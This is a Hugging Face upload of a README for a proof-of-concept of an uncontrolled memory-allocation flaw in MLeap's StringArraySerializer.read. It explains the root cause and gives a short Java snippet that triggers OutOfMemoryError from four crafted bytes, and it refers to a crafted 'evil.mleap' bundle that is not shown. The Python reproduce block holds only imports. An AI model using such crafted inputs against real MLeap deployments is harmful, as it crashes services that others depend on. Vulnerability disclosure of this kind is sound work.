Upload README.md with huggingface_hub
Browse files
README.md
ADDED
|
@@ -0,0 +1,25 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# MLeap StringArraySerializer OOM PoC
|
| 2 |
+
|
| 3 |
+
Proof-of-concept for an uncontrolled resource consumption vulnerability in MLeap's `StringArraySerializer.read`.
|
| 4 |
+
|
| 5 |
+
## Files
|
| 6 |
+
- `evil.mleap`: crafted MLeap bundle ZIP. Loading it triggers `OutOfMemoryError` via `new Array[Byte](0x7FFFFFFF)` in `StringArraySerializer.read`.
|
| 7 |
+
|
| 8 |
+
## Reproduce
|
| 9 |
+
```python
|
| 10 |
+
import struct, zipfile, io, base64
|
| 11 |
+
from mleap.pyspark.spark_support import SimpleSparkSerializer
|
| 12 |
+
# Or load via BundleFile in Scala/Java:
|
| 13 |
+
# BundleFile.load("evil.mleap")
|
| 14 |
+
```
|
| 15 |
+
|
| 16 |
+
## Root Cause
|
| 17 |
+
`StringArraySerializer.read` calls `din.readInt()` on attacker-controlled bytes and passes the result directly to `new Array[Byte](size)` with no bounds check. `OutOfMemoryError` extends `VirtualMachineError`; Scala's `NonFatal` extractor returns false for it, so the surrounding `Try{}` does not catch it — the error propagates and crashes the process.
|
| 18 |
+
|
| 19 |
+
## Trigger (Java)
|
| 20 |
+
```java
|
| 21 |
+
DataInputStream din = new DataInputStream(
|
| 22 |
+
new ByteArrayInputStream(new byte[]{0x7F,(byte)0xFF,(byte)0xFF,(byte)0xFF}));
|
| 23 |
+
int size = din.readInt(); // 2147483647
|
| 24 |
+
byte[] bytes = new byte[size]; // OutOfMemoryError: Requested array size exceeds VM limit
|
| 25 |
+
```
|